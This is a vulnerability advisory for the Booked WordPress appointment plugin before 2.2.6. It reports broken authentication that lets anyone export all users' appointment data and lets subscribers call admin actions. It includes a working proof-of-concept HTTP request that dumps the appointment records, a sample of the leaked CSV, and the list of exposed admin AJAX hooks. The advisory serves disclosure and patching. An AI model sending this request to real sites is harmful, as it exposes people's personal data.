Booked < 2.2.6 - Broken Authentication to Export Users Data in CSV



Description
The plugin allows users to Book Appointment by providing their PII such as Email, Name, Phone Number and Personal Message. The vulnerability allows anyone to Dump all records of users and their appointment details in CSV as an unauthenticated user.

The user also gets registered as a WP User after submitting appointment which introduces more vulnerabilities i.e. a subscriber can approve, delete or modify any appointment and inject Stored XSS.

Edit (WPScanTeam):
February 7th, 2020 - Report Received & Envato Contacted
February 7th, 2020 - Envato Investigating
February 29th, 2020 - v2.2.6 released, fixing the issues
Proof of Concept
Following Request Headers as an unauthenticated user will Dump all User Appointment Details in CSV

======================
Request Header (Start)
======================
POST /wp-admin/admin-post.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close

booked_export_appointments_csv=
====================
Request Header (End)
====================

The response from above request will look like following PII

"First Name","Last Name",Email,Calendar,Date,"Start Time","End Time","Combined Date/Time","Custom Field Data"
noman,riffat,example@example.com,"Custom Calendar","February 7, 2020","8:00 am","9:00 am","February 9, 2020 from 8:00 am to 9:00 am","hello this is a private message"

After the appointment submission user gets registered as subscriber so he can perform following actions which are intended for Administrator only

add_action('wp_ajax_booked_admin_add_appt', array(&$this,'booked_admin_add_appt'));
add_action('wp_ajax_booked_admin_edit_appt', array(&$this,'booked_admin_edit_appt'));
add_action('wp_ajax_booked_admin_delete_custom_timeslot', array(&$this,'booked_admin_delete_custom_timeslot'));
add_action('wp_ajax_booked_admin_adjust_custom_timeslot_count', array(&$this,'booked_admin_adjust_custom_timeslot_count'));
add_action('wp_ajax_booked_admin_add_custom_timeslot', array(&$this,'booked_admin_add_custom_timeslot'));
add_action('wp_ajax_booked_admin_add_custom_timeslots', array(&$this,'booked_admin_add_custom_timeslots'));
add_action('wp_ajax_booked_admin_save_custom_time_slots', array(&$this,'booked_admin_save_custom_time_slots'));
add_action('wp_ajax_booked_admin_save_custom_fields', array(&$this,'booked_admin_save_custom_fields'));
add_action('wp_ajax_booked_admin_add_timeslots', array(&$this,'booked_admin_add_timeslots'));
add_action('wp_ajax_booked_admin_add_timeslot', array(&$this,'booked_admin_add_timeslot'));
add_action('wp_ajax_booked_admin_clear_timeslots', array(&$this,'booked_admin_clear_timeslots'));
add_action('wp_ajax_booked_admin_adjust_default_timeslot_count', array(&$this,'booked_admin_adjust_default_timeslot_count'));
add_action('wp_ajax_booked_admin_delete_timeslot', array(&$this,'booked_admin_delete_timeslot'));
add_action('wp_ajax_booked_admin_delete_appt', array(&$this,'booked_admin_delete_appt'));
add_action('wp_ajax_booked_admin_approve_appt', array(&$this,'booked_admin_approve_appt'));
add_action('wp_ajax_booked_admin_approve_all', array(&$this,'booked_admin_approve_all'));
add_action('wp_ajax_booked_admin_delete_all', array(&$this,'booked_admin_delete_all'));
add_action('wp_ajax_booked_admin_delete_past', array(&$this,'booked_admin_delete_past'));
add_action('wp_ajax_booked_date_formatting', array(&$this,'booked_date_formatting'));
add_action('wp_ajax_booked_admin_disable_slot', array(&$this,'booked_admin_disable_slot'));

add_action('wp_ajax_booked_admin_load_timeslots', array(&$this,'booked_admin_load_timeslots'));
add_action('wp_ajax_booked_admin_load_full_timeslots', array(&$this,'booked_admin_load_full_timeslots'));
add_action('wp_ajax_booked_admin_load_full_customfields', array(&$this,'booked_admin_load_full_customfields'));
add_action('wp_ajax_booked_admin_calendar_picker', array(&$this,'booked_admin_calendar_picker'));
add_action('wp_ajax_booked_admin_calendar_month', array(&$this,'booked_admin_calendar_month'));
add_action('wp_ajax_booked_admin_calendar_date', array(&$this,'booked_admin_calendar_date'));
add_action('wp_ajax_booked_admin_refresh_date_square', array(&$this,'booked_admin_refresh_date_square'));
add_action('wp_ajax_booked_admin_user_info_modal', array(&$this,'booked_admin_user_info_modal'));
add_action('wp_ajax_booked_admin_new_appointment_form', array(&$this,'booked_admin_new_appointment_form'));
add_action('wp_ajax_booked_admin_custom_timeslots_list', array(&$this,'booked_admin_custom_timeslots_list'));
add_action('wp_ajax_booked_admin_get_timeslots_select', array(&$this,'booked_admin_get_timeslots_select'));

Affects Plugin

fixed in version 2.2.6

References

URL https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968
URL http://boxyupdates.com/changelog.php?p=booked

Classification

Type BYPASS

Miscellaneous

Original Researcher Noman Riffat
Submitter Noman Riffat
Submitter Twitter nomanriffat
Views 1615
Verified Yes
WPVDB ID 10107

Timeline

Publicly Published 2020-02-29 (4 months ago)
Added 2020-03-02 (4 months ago)
Last Updated 2020-03-03 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin